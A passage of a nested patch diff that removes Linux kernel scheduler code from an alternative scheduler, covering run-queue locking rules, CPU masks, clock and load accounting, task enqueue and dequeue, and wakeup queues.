-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
-+ * the domain), this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for(i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Init idle task and put into queue structure of rq
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* water mark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assume that the idle task always in queue
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on, this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq
-+*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (NULL != lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq
-+*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compile should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does however cause some slight miss-attribution of {soft,}irq
-+	 * time, a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * Tick may be needed by tasks in the runqueue depending on their policy and
-+ * requirements. If tick is needed, lets send the target an IPI to kick it out
-+ * of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+	sched_info_dequeue(rq, p);						\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags);						\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg based fetch_or, macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
-+
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task, if ->wake_q is !nil already it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
-+
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means the setting of the need_resched flag, on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power-savings.
-+ *
-+ * We don't do similar optimization for completely idle system, as
-+ * selecting an idle CPU will add more delays to the timers than intended
-+ * (as that CPU's timer base may not be uptodate wrt jiffies etc).
-+ */
